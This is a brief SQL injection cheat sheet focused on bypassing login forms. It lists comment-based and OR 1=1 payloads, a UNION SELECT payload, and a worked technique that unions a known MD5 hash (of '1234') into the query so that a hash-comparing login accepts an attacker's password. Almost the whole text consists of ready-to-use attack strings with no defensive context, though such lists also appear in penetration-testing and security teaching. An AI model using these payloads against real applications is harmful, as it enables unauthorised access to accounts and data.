SQL Injection 101, Login tricks:
admin' -- admin' # admin'/* ' OR 1=1-- ' or 1=1# ' OR 1=1/* ') or '1'='1-- ') or ('1'='1-- ....
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
NOTE: Old versions of MySQL do not support union queries.
If the application is first getting the record by username and then compares the returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication.
You can union results with a known password and MD5 hash of supplied password.
In this case, the application will compare your password and your supplied MD5 hash instead of MD5 from the database.
Username :admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055' Password : 1234
NOTE: 81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)